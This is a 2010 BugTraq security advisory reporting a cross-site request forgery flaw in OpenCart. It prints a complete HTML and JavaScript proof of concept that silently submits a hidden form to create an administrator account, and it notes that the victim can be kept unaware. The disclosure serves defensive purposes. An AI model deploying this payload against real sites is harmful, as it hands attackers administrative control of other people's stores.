BugTraq
OpenCart CSRF Vulnerability Feb 02 2010 03:13PM
ben visionsource org
Advisory Information:

Title: OpenCart CSRF Vulnerability

Advisory URL:

http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/

Date published: 2010-01-28

Vendors contacted: OpenCart

Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>OpenCart CSRF Vulnerability</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<script type="text/javascript">

function csrfInjection()

{

var params = {

'username' : 'an_attacker',

'firstname' : 'attack',

'lastname' : 'user',

'email' : 'some.user (at) randomatackerdomain (dot) com [email concealed]',

'user_group_id' : '1', //Default group id for administrator level is 1

'password' : 'test',

'confirm' : 'test',

'status' : '1'

};

var form = document.createElement("form");

form.setAttribute("method", "post");

form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

for(var key in params) {

var hiddenField = document.createElement("input");

hiddenField.setAttribute("type", "hidden");

hiddenField.setAttribute("name", key);

hiddenField.setAttribute("value", params[key]);

form.appendChild(hiddenField);

}

attack_result.document.body.appendChild(form);

form.submit();

}

</script>

</head>

<body>

OpenCart CSRF Vulnerability

<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />

<a href="#" onclick="csrfInjection();return false;">Add User</a>

<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>

<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

</body>

</html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus